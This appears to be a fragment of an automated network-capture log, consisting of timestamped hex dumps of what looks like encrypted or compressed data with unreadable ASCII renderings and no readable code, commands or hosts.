                            Data Ascii: eaMb<c8Mq6 K&S&c%wNO?JtJ:T0?m#r_VIeE(QVa4|x&fH&)#-{$j'T^b&N$I LM;GHfW]\~LlsdenX]x0+<3.
                            2023-03-13 13:10:20 UTC133INData Raw: b0 72 b3 78 3a 31 48 00 e2 9e 11 ae 92 d0 36 50 30 c7 5b 20 eb b0 d8 4d 6d b0 bb bd ed 19 d9 13 03 dd e4 7e 9d d7 3d 9f 07 ac 8a 25 5b e2 07 20 68 75 7b 3d d7 9a 29 80 6b cf 86 2c 14 70 71 1f 21 a3 c9 90 4c 5a 38 60 e2 d9 a8 a4 e2 6b bd 18 87 b5 52 41 04 c4 5a 14 15 78 64 dd 20 3b 7c 7c 1b 5a 79 00 22 a0 50 9f af d3 9c f4 71 97 87 dd 90 31 fa 38 85 5b e8 c7 23 a5 92 51 bb 86 c0 f3 6a c0 54 3a a6 1f 43 17 76 d3 12 74 0b 8a 80 c1 bc 0a 17 af 6d 1c 17 7b fa 81 79 26 83 99 39 bd 53 0d 69 23 f8 3f 1d 08 ac e2 28 07 e5 ac 8e 18 5b a2 d7 c4 86 fd b3 22 0c e3 cf 50 08 2b dd 9a d0 0c 54 d1 50 69 60 21 58 eb 4a 5a e9 dc ae 6b 55 c9 9a e8 35 90 65 d3 ae 3e 38 5e 01 cc 1f ce 43 93 c5 15 b7 db 03 aa e1 d9 fa fa 8f 49 a0 bd c7 b9 28 83 b9 a2 95 d4 ba 77 2b 73 1f 0a bd
                            Data Ascii: rx:1H6P0[ Mm~=%[ hu{=)k,pq!LZ8`kRAZxd ;||Zy"Pq18[#QjT:Cvtm{y&9Si#?(["P+TPi`!XJZkU5e>8^CI(w+s
                            2023-03-13 13:10:20 UTC134INData Raw: b3 b5 33 c7 04 88 e1 fe 1e af 7f e2 0b 2d c1 51 5d 33 20 d4 d9 b9 c3 ef b5 18 e4 72 1c 80 39 aa cb aa 84 c0 d4 b1 17 eb d8 50 a1 3a be dd 20 00 58 e4 11 a3 fa c7 91 5c 32 b5 e9 f3 9d 7d af ca f5 b7 8d 60 3c cd 78 03 04 b9 d5 8d e3 15 b1 b1 67 a5 14 22 b2 d5 32 8f 66 dc 7b f2 7d 1c d7 e8 22 66 51 97 74 29 9d ca 14 81 7e f7 7d 09 77 8d 47 33 a4 40 db 3a ea c0 b5 0b 62 b3 52 ae b0 4b 2b 1d 8a 4e 53 8e 42 48 18 60 fc f5 f9 47 8d f2 e4 dd 70 ef 9a f4 15 1e 71 1b 24 d4 c9 1c 70 c9 a8 15 b6 5d ce c3 11 f8 02 51 84 6c 89 02 a5 55 22 9d f8 b3 50 7e 5a e5 e1 67 e2 4f 56 7a a5 76 6f d2 55 04 a9 69 f3 74 1e 1c a3 1a 80 04 d0 d3 d6 c8 d9 8a 93 7a 2b dc 06 88 07 0b fe cc 13 53 92 11 bb 20 3b 04 e7 27 96 2f 49 9a c8 a8 d6 95 d1 a1 12 c6 d0 28 05 b3 14 63 19 22 f2 92 e6
                            Data Ascii: 3-Q]3 r9P: X\2}`<xg"2f{}"fQt)~}wG3@:bRK+NSBH`Gpq$p]QlU"P~ZgOVzvoUitz+S ;'/I(c"
                            2023-03-13 13:10:20 UTC136INData Raw: 4a 6b b6 1f ae 08 0a df e0 a9 5c 26 79 9b d2 66 84 ee 2e 8d 33 c4 52 03 a3 3c f0 b1 17 32 88 7f 0a 5f c9 63 ad 40 f0 ad 81 c4 89 9f 3b 17 4e dc 63 c3 0c 78 86 19 c9 9c 33 ff 9c ad 40 24 c4 ea 87 14 7c 65 7c ad 02 80 57 3a 50 98 14 2a 57 55 9f 05 4c 60 b0 70 bc 79 d3 27 23 fb 8c 4b 59 ee 5b 22 e3 31 7f 47 8c c0 e3 8b 93 ad 3a a7 82 ca 41 89 f8 33 66 fc 98 83 13 9f 0a 10 3c 6b 44 16 50 f1 03 87 36 82 c8 20 31 95 0c 68 78 d8 17 ab 0b ad e2 c6 d2 1b 2e 8d 1d 22 ef 2b e8 87 f6 b2 36 f0 61 cc 50 41 af 21 c6 d1 3e 42 d4 ac 79 61 5f aa 75 b4 5f e8 82 86 5d a9 cb 9a e8 fb 0d 9b d3 af 83 02 32 fd f3 1e cc a2 8c 39 c0 b2 db 59 13 1d b1 fb b9 7d 55 5d bd c6 2e 46 87 45 1f 94 bc f3 10 d7 78 1f 1a c3 c0 bd f9 03 82 ff 9f 9c b4 f3 06 dc 87 3b a6 1e 8b 9b 31 99 33 37 32
                            Data Ascii: Jk\&yf.3R<2_c@;Ncx3@$|e|W:P*WUL`py'#KY["1G:A3f<kDP6 1hx."+6aPA!>Bya_u_]29Y}U].FEx;1372
                            2023-03-13 13:10:20 UTC137INData Raw: fc fd 51 e0 f0 52 95 75 55 cd 6d 1a c5 5d b7 41 ae 86 d6 77 1e e8 bd d5 d9 8d c4 17 b3 95 f3 53 ff 36 b0 a5 3b 61 b1 a8 cb 74 a3 f2 a0 39 4f af 26 7b 46 d3 5e 71 90 cf b6 61 f3 c8 82 cf c7 34 66 e7 06 ba f2 7b 0c 6e 6e e0 64 57 92 e2 c2 32 32 13 00 96 e3 d2 fb 72 0f f6 34 0b b4 dd ca ec cf 48 1b 64 31 85 ac 4f d6 2d e6 15 b0 db 92 15 d8 9f b6 27 d4 af 5a 2a 1c 3b 07 27 65 02 e7 ca a8 25 9b 85 5b 16 31 27 b4 02 1c 68 6c 98 b0 4d ed dd ed d2 e3 4f fc 7b 76 75 1d ca 11 8d 5f 0c c4 38 76 3c 90 01 f8 fc 60 b0 a2 06 84 42 cb 2c 4f 49 62 d4 8d 5e 35 86 27 3d 49 04 ae c5 d1 6c 3b d8 28 50 9b ed 33 cf f0 c6 94 4a 17 e5 22 b3 a5 b2 2b 96 39 9c 28 1d 2b 0e ab 45 4e e5 ad db 82 42 a7 dd bf 2f b6 b0 48 d5 41 08 33 53 7f 92 63 b0 b6 77 dd 17 6d 61 e4 07 2a d2 a5 94 cb
                            Data Ascii: QRuUm]AwS6;at9O&{F^qa4f{nndW22r4Hd1O-'Z*;'e%[1'hlMO{vu_8v<`B,OIb^5'=Il;(P3J"+9(+ENB/HA3Scwma*
                            2023-03-13 13:10:20 UTC138INData Raw: 05 20 68 0b 78 1a d7 a3 1c 8a 6a df 86 28 16 f2 73 a8 21 84 c9 73 79 58 39 60 e2 8a ac 71 e6 e0 bd 3d 87 be 64 43 05 c4 5a 47 17 a8 69 56 20 0e 7c 57 1b 50 78 90 22 c2 74 1d ad d5 9f be 71 bc 87 d7 91 a1 fa 1d a7 d9 ea fe 20 ed 92 7a bb 8c c1 63 6a 00 71 b8 a4 2e 40 49 76 f8 12 66 0a 1a 80 86 9e 88 15 83 6e 4b 17 50 fa 00 78 35 83 4e 24 c2 49 4c 69 76 f8 14 1d 09 ac e1 28 17 e6 8a 8b ab 58 f7 d7 e8 86 f6 b2 31 0c a7 cc cf 0f 0b de c8 d0 3e 54 d0 50 7a 60 99 5f fc 4f 95 ea 8c ae 59 55 cb 9b eb 35 94 7f 2e b6 c7 38 38 01 f3 1f cc 42 90 c5 06 b2 7f 04 a1 e2 bf fa b9 8f 4a a1 be c7 e8 2b 1c be a2 96 b2 ba 30 2b 78 1e 19 bd 02 40 6c 05 48 2e b1 60 b4 f2 06 4c 80 c7 20 07 76 44 57 65 3d 36 32 6e b1 39 c1 2d ac 13 86 0b 33 a6 8c ba a4 20 15 ff 75 6d 91 dd db 92
                            Data Ascii: hxj(s!syX9`q=dCZGiV |WPx"tq zcjq.@IvfnKPx5N$ILiv(X1>TPz`_OYU5.88BJ+0+x@lH.`L vDWe=62n9-3 um
                            2023-03-13 13:10:20 UTC139INData Raw: 20 c6 05 e5 11 b3 fa 71 9f 23 28 9a e9 15 9d a9 f2 cb f5 a7 8d 51 36 9a 7e d4 04 5f d5 7e be 94 b0 a1 67 75 0a 22 b2 f0 37 68 66 28 26 f0 7d 0c d7 8c 21 e4 53 84 71 ce 9d 41 4a 00 7f e7 7d 66 6c f2 5d 1c a4 a1 db 4a b4 ca b4 1b 62 d7 59 7b b4 04 2b ee 8a 3c 0d 84 43 58 18 33 f0 77 fb fa 88 03 e4 b2 2e e5 9b e4 15 6f 72 99 26 5f cc 1e 71 b0 cb 1f b7 4d ce a1 15 7a 00 42 83 6d 88 eb c7 57 23 9d f8 81 4a 83 42 6e e1 7b e3 9d 34 78 a4 76 6f 65 59 d1 ad 1a f3 60 1f d6 c1 9b 81 14 d0 21 c8 c8 d9 af 96 5f 2a 62 64 09 06 1b fe d1 11 53 92 02 be 05 3a d7 81 25 97 2f 49 9e d2 55 ce 1e d1 84 13 22 b6 a9 04 a3 14 c1 09 75 f4 45 e6 c6 82 b1 b3 12 05 ff 7d fa 67 15 23 7d 7b 67 be c5 34 aa 94 85 4b 0c b4 75 f5 cf 6c 89 9c b3 55 52 3a 2b b6 99 97 dc c7 b0 fe b1 89 e6 ac
                            Data Ascii: q#(Q6~_~gu"7hf(&}!SqAJ}fl]JbY{+<CX3w.or&_qMzBmW#JBn{4xvoeY`!_*bdS:%/IU"uE}g#}{g4KulUR:+
                            2023-03-13 13:10:20 UTC141INData Raw: 58 a8 60 37 08 c3 a4 ec ca 41 a8 87 9e 52 43 94 c4 cd 81 78 78 6a 7c f8 9c 7c 57 1b 50 e9 08 21 4a 72 9f a1 4e 9b 2d 71 bc 87 d7 17 39 07 94 ad 5b e6 5a 3c 7e 92 7a bb 8c 27 ea bf 95 83 3a a8 82 64 da 76 f8 12 66 8c 92 02 15 9e 0f 19 32 5d d8 17 50 fa 00 9e 37 01 ca 2a 3a 5f 08 ea d8 f8 14 1d 09 2a fa d5 c9 cd 2e 82 1d c0 59 d7 e8 86 f6 54 3b d9 65 1f 50 06 b6 7e 66 d0 3e 54 d0 d6 71 e2 5d 7e 6c 46 5f 45 22 ae 59 55 cb 7d e9 b7 10 71 d6 a0 83 e8 94 01 f3 1f cc c4 8b 38 d8 99 db 0d 17 09 13 fa b9 8f 4a 47 b4 12 2a f8 83 b7 1f 65 1e ba 30 2b 78 98 12 3f c6 61 fc 0c 82 d1 1d 60 b4 f2 06 aa 82 45 a4 09 8e 52 13 99 97 36 32 6e b1 a8 c2 f8 6e 7d 22 02 48 fd 24 ba a4 20 15 6e 76 ef 55 1d 49 9b b2 36 14 10 de 95 18 68 e4 47 25 e2 6f 22 97 0c 26 f8 98 e5 16 53 b7
                            Data Ascii: X`7ARCxxj||WP!JrN-q9[Z<~z':dvf2]P7*:_*.YT;eP~f>Tq]~lF_E"YU}q8JG*e0+x?a`ER62nn}"H$ nvUI6hG%o"&S
                            2023-03-13 13:10:20 UTC142INData Raw: 4f 75 06 08 8c d5 5e e2 94 36 b9 9a eb 28 a0 bf d0 16 bb 66 04 7a f0 9b 05 02 6e f2 66 5e 92 58 1d 9d 29 15 00 f9 ef ff e2 54 0a 4a 36 9c 72 db ca eb ca 52 1a e0 33 46 ab bf d6 e3 3e 8a b4 52 84 c5 40 e5 ad d2 f5 f6 da 6d d3 e4 26 71 e5 7d ed c0 8d a1 1b 2b 49 21 ce 71 34 a9 1f 31 45 4c 32 35 fd 0d cc 70 bd 88 ff a4 57 c5 9c 7a 05 44 7b 55 44 9d 95 e3 b1 57 78 35 76 ba 87 3f 04 a6 c8 b3 8f 1f e2 a2 9b 07 0c 2d bf ea 4a d4 8f cb b0 2a 22 07 09 e0 12 2b 33 c2 d1 9f 14 db ea 3a 03 e5 25 11 27 cb 1a ea ad d9 34 bd 6b 13 ce d2 a9 e2 a2 96 25 16 a5 ff 97 d6 2b 82 45 d7 12 83 e7 80 64 45 97 2e 5d 36 8a be c5 51 aa 72 8c 9e ee 67 f7 f8 d9 39 64 9c bb 32 52 bc 23 34 1d af 24 d0 9a a2 5c 89 c6 cb 99 32 bb c6 2f c6 e3 aa 2c ce 5f 79 89 72 2b 07 f0 0e 82 dc e4 29 6b
                            Data Ascii: Ou^6(fznf^X)TJ6rR3F>R@m&q}+I!q41EL25pWzD{UDWx5v?-J*"+3:%'4k%+EdE.]6Qrg9d2R#4$\2/,_yr+)k
                            2023-03-13 13:10:20 UTC143INData Raw: 20 00 7c d6 1b 85 7c c5 34 4a 54 63 b1 4f 9c b0 71 3a 87 55 93 8f fa 95 87 77 f7 5b 23 e3 92 fc bb 59 c5 93 6d 88 51 3a 86 83 43 47 76 7e 12 f1 08 87 8a 0e be 76 37 33 6d 45 17 d6 fa 82 7a d0 95 d1 3c 5f 70 09 69 78 f8 95 1d 8b ae 10 3e c8 e7 da ad 1c 5b f9 d7 69 86 74 b0 c5 1a 78 cd 74 2a b7 dd c6 d0 bf 54 52 52 e5 76 46 5e 11 66 5e e9 82 ae df 55 1e 9f 7c 31 0b 67 73 9e 82 38 36 01 72 1f 19 46 e9 d2 d9 b3 8f 38 16 e1 b1 fa 2a 8f c8 a3 33 d0 37 2a 7f 82 1e 95 bc ba a1 2b ad 1a 3c bd dd 41 e9 3f 83 2d bf 60 25 f2 91 4e 0d d0 bf 1f 1b 61 12 65 33 36 a3 6e 42 3d e4 2d 73 12 4e 32 49 a5 82 ba 35 20 97 fd 90 7a 4e dc a4 aa b3 01 b3 10 4f 95 9a ec 29 bc 24 c8 8b 6c 96 43 81 f8 09 e5 c3 b1 6b e2 f1 6e d7 db 66 ff 54 f1 6a 94 e6 fe 86 00 b8 48 36 e5 20 f6 bd 6c
                            Data Ascii: ||4JTcOq:Uw[#YmQ:CGv~v73mEz<_pix>[itxt*TRRvF^f^U|1gs86rF8*37*+<A?-`%Nae36nB=-sN2I5 zNO)$lCknfTjH6 l
                            2023-03-13 13:10:20 UTC144INData Raw: 7f 03 cb 46 20 66 51 92 74 40 9d ba 35 82 7d c3 61 cc 74 0f 45 36 a4 2f db 5c cb 48 b6 22 7e 1d 50 e6 df d7 2b e0 8a 25 4a 87 5a 7e 18 99 f8 16 96 db 8d 0d e4 a0 69 18 83 a0 09 a5 73 ef 4b 48 c9 10 71 b2 b1 e2 af 1e d2 1c 15 2c 72 cd 84 63 88 19 a5 6d 28 b7 f8 2b 52 2b 2b 45 e1 75 e3 37 4f 85 bc 56 6a af 50 74 d8 c9 f3 6e 1f 74 a2 19 83 2b d6 8b c0 52 a9 8e 93 51 2a b4 07 8b 04 69 f4 1b 10 c5 e3 15 bb 0b 3a 95 e5 f0 93 5b 49 34 ca d8 a5 35 d1 8a 13 58 d2 2b 06 c3 14 0b 00 54 83 96 e6 c8 82 d3 d7 90 07 3a 61 50 6f c3 55 5c 7e 69 be 53 51 28 96 bd 4d c6 b5 67 83 d8 69 87 9c 2d 32 d0 38 72 b8 33 8f 75 aa 9b fe bf 89 50 cb 1b d6 34 43 01 d0 26 d0 2d a2 ba 79 1f 72 a9 83 e6 f2 b6 f6 f4 50 6a b1 82 47 05 59 e2 ef 1d 57 3c d5 de 3c ca 58 f0 78 d6 a7 28 23 6d 64
                            Data Ascii: F fQt@5}atE6/\H"~P+%JZ~isKHq,rcm(+R++Eu7OVjPtnt+RQ*i:[I45X+T:aPoU\~iSQ(Mgi-28r3uP4C&-yrPjGYW<<Xx(#md
                            2023-03-13 13:10:20 UTC145INData Raw: 3f 86 5b e8 5a e5 e3 10 78 58 8c f6 e3 b6 22 50 3a a6 82 85 47 ac f6 c0 66 3d 9a 1d a3 bf 0a 17 32 eb 5d ea 48 d0 00 4f 36 26 7c 3d 3f 51 08 ef 60 05 0c c2 2b 9b e2 93 65 e6 2e 8c 1d 9d f1 02 ec 4a d7 85 32 d8 d5 cc 50 08 b6 5b ce 47 3c 98 f1 67 79 64 ee 5f 69 48 5f 6f 8a 5d 5d 18 dd ac e8 d0 a6 66 d3 ae 83 be 3e b5 f1 cd cc 75 93 28 74 b2 db 03 17 67 b9 78 bb af 4f 96 bd 3f 9a 2b 83 b9 1f 53 bc 38 32 c8 78 29 1a 71 71 40 f9 02 82 eb bf ba ba 20 06 7b 83 1b 10 1e 8b 5c 13 f3 33 b4 30 97 93 0e c2 b0 de 13 22 0c 48 23 9a 47 bc 0a 15 c8 76 d1 ef dd 44 95 b2 87 ab ed c6 94 3b d9 fc 6e 85 c9 6f 2c 97 85 89 2d 9c 29 37 82 be 17 50 6f 72 fb 66 79 5c 66 ee 40 3a d1 ac fb 19 49 56 a7 21 70 b5 ee b5 5d 21 51 c2 06 b1 a0 86 27 12 5c 89 6a 76 e0 58 69 c5 ec 65 ba d1
                            Data Ascii: ?[ZxX"P:Gf=2]HO6&|=?Q`+e.J2P[G<gyd_iH_o]]f>u(tgxO?+S82x)qq@ {\30"H#GvD;no,-)7Porfy\f@:IV!p]!Q'\jvXie
                            2023-03-13 13:10:20 UTC147INData Raw: ad d2 ca 51 c0 8b 19 bb 31 57 a8 f4 d4 92 e0 9d b5 18 86 aa 58 c8 ba b7 f7 c8 db 73 01 36 26 c0 e5 c7 eb d9 8b c2 1b 6c 43 a9 10 18 34 0f 02 64 4f a7 30 1b eb d8 ce 6d 63 61 f2 41 55 92 9d 74 19 50 7d b3 44 41 6d e1 b2 06 79 59 6e 65 80 59 05 84 de 45 6c 46 e3 f6 91 b8 17 b1 a6 b0 4d 9e 8c ca 50 6d 2f 3e 0a 0f 1a e9 36 be
                            Data Ascii: Q1WXs6&lC4dO0mcaAUtP}DAmyYneYElFMPm/>6
                            2023-03-13 13:10:20 UTC147INData Raw: d1 f9 15 cf 17 b3 00 8c 24 37 27 c6 1b bb a9 ff 3d 03 8a 1a cf a6 8b 91 a0 1d 27 d0 ad da 97 7f c9 7f 5d fd 12 ac fe 9d 60 7f 93 90 5c 83 71 94 c5 f0 ab 69 9d 61 ea 0c f6 0a c1 2d 87 3d ba d6 57 2c 2f 17 1e 25 31 c2 9e 5f be 44 d8 e1 99 75 bb 09 3b fa e6 cc 2c 30 98 13 89 b3 2a b8 f0 db 9e 37 e5 95 76 9e 86 2e 92 d0 65 a1 5b 3b 11 1a 5e 99 cb b1 f0 91 4d f4 ae 98 19 60 bd 54 27 e9 5d 64 8f f0 ea de 61 9b b7 b3 d0 32 b8 ad 1b a2 67 b6 26 7e fb 12 7b 97 13 90 28 ea 01 63 d7 b8 1b 53 79 bc f9 06 66 ed 8d 43 f5 22 46 80 6c d0 5d 41 9b 3f 66 da ad a3 bc de 01 8b 9f 7e b5 40 d1 5f 40 56 4b cd a6 80 b5 cc 50 bf b6 02 bc fa 08 7e e4 6e 5f 69 7d 25 d6 dc 90 b2 32 eb 35 fa 57 dd a7 61 74 92 15 2a 93 03 8a 9b de 7b b6 3c 70 98 83 72 82 2c bf a5 59 c3 67 bc 08 55 a5
                            Data Ascii: $7'=']`\qia-=W,/%1_Du;,0*7v.e[;^M`T']da2g&~{(cSyfC"Fl]A?f~@_@VKP~n_i}%25Wat*{<pr,YgU
                            2023-03-13 13:10:20 UTC148INData Raw: 8d 96 ba e9 2b 10 3c 21 b3 4d 42 28 23 ce 23 0e 60 76 f5 8f 4c e2 c7 03 16 e4 5c 8a 66 ce 2e 18 6e 20 3a 3f 35 95 1c bb 0c 3c aa 9d b8 1d 20 02 fe 7b 62 ce dc d8 90 a0 0e 2a 10 e4 9e 32 ee 95 ba 14 d3 fb 28 ce 41 57 d9 d4 eb af b5 a9 e5 bc 61 cb f8 9b e7 7e f1 2d 8f a6 eb 86 00 f8 4a 80 86 a0 f9 7c 6f 91 5f 8e 69 0b 01 9f bb 40 28 db d9 88 9b be a2 77 5c b5 e2 b3 bb 20 14 d2 45 c5 9b 8d 7d a9 08 03 70 eb 26 7f 2e c8 39 31 74 ed 80 00 9f 16 2d 47 df 0c 70 dd aa 7e a7 90 6a 1c a4 5c a3 a6 22 72 f2 70 a5 85 7b b9 c2 a2 86 b4 48 b7 33 4e 0c 19 12 c8 3f ca ed 65 b6 bb 4b 33 ae af 51 c4 ed 7c 69 bc bf 07 ff f8 4f 96 f5 da 85 b8 4a 08 6b ec c1 ab b3 c5 2e 17 d2 21 21 10 3d c9 c5 a4 fd 3b b3 13 f5 ae ce d4 a0 3d 1b 44 a9 f6 da 29 a7 fd a9 4d 5e 9e 06 fa 5d b9 5b
                            Data Ascii: +<!MB(##`vL\f.n :?5< {b*2(AWa~-J|o_i@(w\ E}p&.91t-Gp~j\"rp{H3N?eK3Q|iOJk.!!=;=D)M^][
                            2023-03-13 13:10:20 UTC149INData Raw: 01 ae 08 ef 1d c9 f1 cb e3 66 82 2c d6 80 0c 15 60 15 6e ca 30 77 7e e8 bb 95 5a 58 89 0c 4e 17 ad d7 f2 50 6c 5a 85 43 2e 4b 3f 3b ac 10 91 b0 da b0 ec aa 97 5f ce 67 d8 b1 4e 24 d5 3f bd 07 bc 1b 7c f9 6c 1a 9f f1 f6 b0 e4 91 21 d2 b1 28 55 a4 47 99 e9 65 41 3a d5 f7 4e b3 47 3e 78 b9 a7 70 2f 67 64 75 08 39 92 2a 80 31 ab 13 7f 1c 92 7f d4 29 ab b2 53 e2 ad bc ad a2 9d 02 70 0e 0f 98 dd d3 41 6b 05 78 ca cb 84 f6 78 56 ce c2 90 74 82 65 be 8e 57 0c 9b ca 2b 68 b4 27 b4 31 20 1a 4f f8 fa 0e 0f d4 97 f9 38 e5 2e a1 5c 5f f1 24 c6 99 68 7f a9 17 f3 58 d9 1d 1f 75 e6 92 98 fd 30 29 19 b4 8b 56 4f 31 01 5b 6f 8d 63 34 d2 8a 2f 77 72 36 98 af 10 3c 6c a2 24 8b cf d6 5d 53 3d 69 e4 f1 b4 8e e2 c3 bb f5 8f be 57 4a 03 49 50 a3 12 69 62 81 38 f3 62 46 1d 20 6c
                            Data Ascii: f,`n0w~ZXNPlZC.K?;_gN$?|l!(UGeA:NG>xp/gdu9*1)SpAkxxVteW+h'1 O8.\_$hXu0)VO1[oc4/wr6<l$]S=iWJIPib8bF l
                            2023-03-13 13:10:20 UTC150INData Raw: a4 17 8b d4 17 93 30 3e 32 e2 b5 36 c1 25 6a 82 26 7d 54 ad 82 2e a0 56 09 f7 76 f5 53 a7 58 9d b2 9d b7 90 c2 9d 18 4e f8 3f 21 c0 6f 88 93 c9 9d f0 98 4d 12 3a a2 ec e8 de 76 9c 64 f7 54 45 e8 a2 1b ee ac b8 a5 24 54 a0 21 02 b9 b5 96 57 02 9e c6 de 21 a6 86 13 17 03 a0 9e 72 95 4b ba e4 ef dc 87 d4 f1 68 4f 6b db 79 95 a0 2e e0 34 1f c9 1e 2d 2b 71 e5 87 31 9f 10 c3 62 dc 9b c0 10 30 29 5e d7 b6 ba 3e d0 7b 6a a5 84 6a b3 0b ac ba 3c 37 70 3e 2f 84 42 2d 7e cc 92 13 33 76 01 3d c2 f8 1e d7 7a 4e 2a a8 c3 38 58 e7 02 64 d8 c8 c6 f4 97 49 f1 84 1b 8b 1b 4d cb 13 80 d0 f6 a6 17 52 de c6 81 38 be bd 25 d1 7b e2 11 37 ff 49 92 d9 30 38 ec 01 bf b6 ae 47 f0 ba af b0 3f df 7f 26 26 56 d5 ca e7 b7 92 a6 67 6b 07 86 92 d7 32 fa 63 2d 58 f7 7d ac d2 46 02 61 51
                            Data Ascii: 0>26%j&}T.VvSXN?!oM:vdTE$T!W!rKhOky.4-+q1b0)^>{jj<7p>/B-~3v=zN*8XdIMR8%{7I08G?&&Vgk2c-X}FaQ
                            2023-03-13 13:10:20 UTC152INData Raw: 69 90 c5 51 8e bf 85 65 ea 35 d3 dc d9 47 87 3c 9f 19 52 14 2b 96 3a a4 21 f1 9a be 9a a2 c6 e5 99 34 9f 6f 2d fe e6 a5 0a 89 ba 57 89 52 0d aa e8 dd 9a b6 c2 0d 6b 9f 82 27 b5 72 60 c3 5f ca 36 fe 56 65 cb 98 d6 53 40 89 aa c1 3f 4f bc 23 23 80 7b b5 88 80 ee 47 46 a7 b6 ff d4 f3 9f 7b 03 86 64 df 00 a8 e3 5b 7f 96 34 e8 0a 6a 01 aa f1 e1 12 af 79 65 d0 e5 73 bb 89 ba dc 8b 4f 7c 6c 19 75 1e b9 9f 62 73 85 15 b3 64 05 c2 b6 3a ad bc d1 76 69 1b 50 77 a2 29 9c f3 48 43 b6 5b 95 c6 09 f7 e0 47 75 cd 7b b3 d2 5d bb 2c 2d a5 35 5b 7d 9e a8 9b 62 5b 3f 4c 81 d7 98 ca f4 ad ae 38 70 b1 a9 0a 8a e7 bb ac 75 12 60 cc 0c 4d 89 c9 ca 93 33 87 b0 79 43 2b c4 5b ad 3c 78 4a 7c 00 2e 57 57 35 50 59 3e 09 53 7a 9f ef 60 b7 b0 5f bc 06 f9 ba 21 d4 8c 26 75 c3 5a 0d e3
                            Data Ascii: iQe5G<R+:!4o-WRk'r`_6VeS@?O##{GF{d[4jyesO|lubsd:viPw)HC[Gu{],-5[}b[?L8pu`M3yC+[<xJ|.WW5PY>Sz`_!&uZ
                            2023-03-13 13:10:20 UTC153INData Raw: 20 7c f4 77 6d 57 dd 6f 95 fd 20 b2 10 de 94 35 ee bf a0 3f c8 6f 2d b8 43 da d8 9a e5 16 b4 8f e4 8b 6b 73 fb 66 fe 67 f1 90 89 18 e6 ac 01 94 48 6e b8 25 f6 bd 6d 80 50 4d 46 c6 02 00 a0 bf 27 d0 d4 84 99 36 ac 75 5e 49 e0 d9 bb 97 17 74 48 37 88 7a 7f 81 28 df 70 f3 2c 3a 2a 2b 38 a1 77 87 90 15 8f 67 2e f9 c7 1e 76 2d a8 f6 b0 ff 6a 1d ba 4c a2 84 33 f1 f2 35 a0 3b 6b 75 c3 47 83 79 4a 7c 33 b3 15 78 12 96 23 e7 ff 1e be 32 4b 35 b4 c4 54 5d ee 6f 63 e4 aa c4 ff b5 4f a0 f0 22 97 3e 4a cc 6a d0 c1 ae aa 16 2e db d3 f8 3f b0 2b 28 c6 59 e4 66 b3 69 d7 86 de 30 b1 90 1b 39 91 af cb f5 a6 f6 b7 40 6f 7b 06 04 50 a8 5e c1 9c b3 a1 67 f2 c7 a0 ec c8 36 66 66 05 bd f0 93 1e d3 6a 20 67 98 92 3b c7 99 29 51 01 ce e5 ce c0 7d 0f 05 37 17 ad 98 eb e2 ca f0 1a
                            Data Ascii: |wmWo 5?o-CksfgHn%mPMF'6u^ItH7z(p,:*+8wg.v-jL35;kuGyJ|3x#2K5T]ocO">Jj.?+(Yfi09@o{P^g6ffj g;)Q}7
                            2023-03-13 13:10:20 UTC154INData Raw: fb 12 ed 9a ac da e8 a2 82 f7 a0 89 76 2d 84 89 ec 42 d6 89 4b 89 39 4e f8 be 92 f6 83 81 76 0a d8 f0 27 a1 59 24 84 3c 3e 79 ba 38 2a b9 21 90 4a 40 c0 cf 55 46 2d c8 68 4e b2 5c ca fd de 82 02 01 bf b6 b6 b1 c7 e7 19 77 cd 09 8c 27 dc bc 26 0b 77 67 aa 69 05 73 78 b7 b3 5b ef 10 11 ac b7 03 f0 da f3 8e c5 72 60 58 b9 02 6a ea c5 03 c7 c4 5d f2 38 77 83 e6 58 c3 fb a5 62 39 40 35 0a cb 93 d0 e5 79 59 82 bb e8 82 5c 90 8e 73 69 d2 7b cf b7 5c f5 4e 43 ff 03 6f 56 51 cd 23 1e 0f 22 e3 8b 76 d5 39 ab e7 da 7f 13 30 f0 53 eb b0 f2 22 31 4d 34 9b 7c c9 f7 8b b0 d8 0e bf aa 52 0e 41 f1 5a dc 48 2b 10 1d 54 69 1f 16 69 22 19 69 6b 3d 3d eb fb 37 ec d5 22 d5 fd b2 ac 10 cc 8c d5 3e 89 3e 76 aa fc 0e 8a ba c1 b7 05 c4 18 54 d2 b3 75 47 24 9d 73 02 43 f4 f4 26 88
                            Data Ascii: v-BK9Nv'Y$<>y8*!J@UF-hN\w'&wgisx[r`Xj]8wXb9@5yY\si{\NCoVQ#"v90S"1M4|RAZH+Tii"ik==7">>vTuG$sC&
                            2023-03-13 13:10:20 UTC155INData Raw: f2 27 81 9f fd 91 49 fc cd ad 86 18 13 97 0f 9b 54 96 89 f8 44 a1 d9 69 c5 48 11 c2 55 b0 d4 09 db 34 02 32 b0 6b 6d e4 e8 43 12 88 e4 f8 16 f9 21 1b ab 8c dc e8 b4 78 2d 48 2a eb 0c 1a ef 4d e0 17 7f 50 60 79 4e 5a 8f 19 74 98 77 ea 13 70 f7 ae 7c 0c 45 db 93 d2 d5 04 b1 a7 0c c7 f0 67 c6 82 e8 cf 7e 04 00 ac 6a 83 05 28 0f 7f dc 63 56 60 46 50 95 91 7a bf 2d 24 7d c1 a7 54 2e 8a 54 3c 95 dd b7 97 da 2a f1 b3 72 ec 49 28 a4 0a f7 a5 d4 e3 72 2e 98 b7 a3 7b db 3d 41 a3 59 87 74 b3 a8 92 f7 b2 51 d3 8c 1b d4 d5 cb a5 81 ce f9 ce 6d 2a 1c 63 76 34 bb 3d 87 94 c3 c4 13 ac 4f cf d4 b5 32 20 0f 68 1f bd 12 68 b2 6a 70 07 35 f6 1d ae fa 64 7a 64 1a e7 3e 92 0d 7f 31 59 f7 db a9 af 8a a7 f9 74 06 54 50 ed df bb 5b 92 ef c7 21 ed 2c 36 55 da 9c 90 f9 99 e4 7d 8c
                            Data Ascii: 'ITDiHU42kmC!x-H*MP`yNZtwp|Eg~j(cV`FPz-$}T.T<*rI(r.{=AYtQm*cv4=O2 hhjp5dzd>1YtTP[!,6U}
